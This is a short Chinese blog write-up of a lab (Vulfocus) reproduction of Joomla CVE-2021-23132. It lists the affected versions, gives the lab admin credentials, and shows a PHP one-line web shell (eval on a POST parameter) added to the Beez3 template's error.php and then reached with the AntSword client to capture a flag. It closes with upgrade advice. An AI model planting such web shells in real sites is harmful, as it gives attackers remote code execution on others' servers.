【Vulfocus靶场复现】joomla 远程代码执行 (CVE-2021-23132)
漏洞介绍
Joomla是一套知名的内容管理系统,其使用PHP语言和 MySQL数据库开发,可以在Linux、 Windows、MacOSX等各种不同的平台上运行 Joomla官方发布安全公告,修复了Joomla中的一个远程代码执行漏洞(CVE-2021-23132),其CVSSv3评分为7.5。由于Joomla com_media模块对上传文件校验不严格,攻击者可以通过上传恶意文件,从而实现远程代码执行。
影响范围
3.0.0 <= Joomla! <= 3.9.24
漏洞复现
-
打开靶场环境,根据提示,后台路径:/administrator 超级管理员:superadmin:123456 普通管理员:admin:123456 ,我登录直接登录的是超级管理员账号进行操作的。因为中途有个地方要上传 config.xml 始终无法上传。
-
进入模板目录,编辑 Beez3 模板
编辑 error.php 页面,直接添加PHP一句话木马,添加完成后,点击上面的 Save 保存页面。
eval(@$_POST['a']);
- 上蚁剑链接这个页面: http://localhost/templates/beez3/error.php
链接成功,获得flag
修复建议
建议相关用户升级到3.9.25及以上版本。或者登陆系统后台,系统会提示升级,点击一下完成自动升级即可。
本文来自博客园,作者:温氏效应,转载请注明原文链接:https://www.cnblogs.com/w328/p/15734956.html